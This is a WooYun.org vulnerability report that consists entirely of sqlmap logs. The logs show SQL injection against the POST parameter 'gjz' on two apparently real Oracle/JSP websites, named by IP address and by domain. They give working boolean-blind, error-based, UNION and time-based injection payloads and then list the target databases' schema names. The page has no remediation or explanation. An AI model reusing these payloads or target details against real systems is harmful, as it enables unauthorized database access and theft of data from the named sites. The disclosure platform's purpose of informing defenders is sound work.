WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: gjz
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gjz=11%' AND 8787=8787 AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: gjz=11%' AND 9400=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(101)||CHR(111)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9400=9400) THEN 1 EL
SE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(119)||CHR(112)||CHR(113)||CHR(62))
) FROM DUAL) AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: gjz=-5183%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,CHR(113)||CHR(101)||CHR(111)||CHR(98)||CHR(113)||CHR(88)||
CHR(100)||CHR(79)||CHR(101)||CHR(121)||CHR(99)||CHR(109)||CHR(79)||CHR(78)||CHR(
111)||CHR(113)||CHR(105)||CHR(119)||CHR(112)||CHR(113),NULL,NULL,NULL FROM DUAL-
- &fy=1&lb=0&type=lylb&state=mhcx
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: gjz=11%' AND 9663=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(85)||CHR(1
20)||CHR(69),5) AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
---
[14:33:17] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[14:33:17] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:33:17] [INFO] fetching database (schema) names
[14:33:18] [WARNING] reflective value(s) found and filtering out
[14:33:18] [INFO] the SQL query used returns 29 entries
[14:33:19] [INFO] retrieved: CTXSYS
[14:33:20] [INFO] retrieved: DBSNMP
[14:33:20] [INFO] retrieved: DMSYS
[14:33:21] [INFO] retrieved: DRV_ADMIN
[14:33:22] [INFO] retrieved: DRV_HEALTH
[14:33:22] [INFO] retrieved: EXFSYS
[14:33:23] [INFO] retrieved: HR
[14:33:24] [INFO] retrieved: IX
[14:33:25] [INFO] retrieved: JSRH_USER
[14:33:25] [INFO] retrieved: MDSYS
[14:33:26] [INFO] retrieved: OE
[14:33:27] [INFO] retrieved: OLAPSYS
[14:33:27] [INFO] retrieved: ORDSYS
[14:33:28] [INFO] retrieved: OUTLN
[14:33:29] [INFO] retrieved: PM
[14:33:29] [INFO] retrieved: QSWEBCGS_USER
[14:33:30] [INFO] retrieved: SCOTT
[14:33:30] [INFO] retrieved: SH
[14:33:31] [INFO] retrieved: SYS
[14:33:32] [INFO] retrieved: SYSMAN
[14:33:32] [INFO] retrieved: SYSTEM
[14:33:33] [INFO] retrieved: VEH_ADMIN
[14:33:34] [INFO] retrieved: VIO_ADMIN
[14:33:34] [INFO] retrieved: WKSYS
[14:33:35] [INFO] retrieved: WK_TEST
[14:33:36] [INFO] retrieved: WMSYS
[14:33:36] [INFO] retrieved: WMS_USER
[14:33:37] [INFO] retrieved: WSCGS
[14:33:38] [INFO] retrieved: XDB
available databases [29]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] EXFSYS
[*] HR
[*] IX
[*] JSRH_USER
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QSWEBCGS_USER
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WK_TEST
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
[14:33:38] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\60.211.179.22'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: gjz
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gjz=11%' AND 6826=6826 AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&in
dex=260
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: gjz=11%' AND 3087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(98)||CHR(115)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3087=3087) THEN 1 EL
SE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(117)||CHR(122)||CHR(113)||CHR(62))
) FROM DUAL) AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&index=260
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: gjz=11%' AND 8292=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(99)||CHR(
121)||CHR(120),5) AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&index=260
---
[14:35:30] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:35:30] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:35:30] [INFO] fetching database (schema) names
[14:35:32] [INFO] heuristics detected web page charset 'GB2312'
[14:35:32] [WARNING] reflective value(s) found and filtering out
[14:35:32] [INFO] the SQL query used returns 35 entries
[14:35:32] [INFO] retrieved: CTXSYS
[14:35:33] [INFO] retrieved: DRV_ADMIN
[14:35:33] [INFO] retrieved: DRV_HEALTH
[14:35:34] [INFO] retrieved: HR
[14:35:34] [INFO] retrieved: LCZW
[14:35:34] [INFO] retrieved: MDSYS
[14:35:35] [INFO] retrieved: NLV_ADMIN
[14:35:35] [INFO] retrieved: ODM
[14:35:35] [INFO] retrieved: ODM_MTR
[14:35:36] [INFO] retrieved: OE
[14:35:36] [INFO] retrieved: OLAPSYS
[14:35:36] [INFO] retrieved: ORDSYS
[14:35:37] [INFO] retrieved: OUTLN
[14:35:37] [INFO] retrieved: PM
[14:35:37] [INFO] retrieved: QS
[14:35:38] [INFO] retrieved: QSWEBCGS_USER
[14:35:38] [INFO] retrieved: QS_CBADM
[14:35:38] [INFO] retrieved: QS_CS
[14:35:39] [INFO] retrieved: QS_ES
[14:35:39] [INFO] retrieved: QS_OS
[14:35:40] [INFO] retrieved: QS_WS
[14:35:40] [INFO] retrieved: RMAN
[14:35:40] [INFO] retrieved: SCOTT
[14:35:41] [INFO] retrieved: SH
[14:35:41] [INFO] retrieved: SYS
[14:35:41] [INFO] retrieved: SYSTEM
[14:35:42] [INFO] retrieved: TMRI_VIO
[14:35:42] [INFO] retrieved: VEH_ADMIN
[14:35:42] [INFO] retrieved: VIO_ADMIN
[14:35:43] [INFO] retrieved: WKSYS
[14:35:43] [INFO] retrieved: WMSYS
[14:35:43] [INFO] retrieved: WMS_USER
[14:35:43] [INFO] retrieved: WSCGS
[14:35:44] [INFO] retrieved: XDB
[14:35:44] [INFO] retrieved: ZWELL
available databases [35]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LCZW
[*] MDSYS
[*] NLV_ADMIN
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QSWEBCGS_USER
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TMRI_VIO
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
[*] ZWELL
[14:35:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.lcwscgs.com'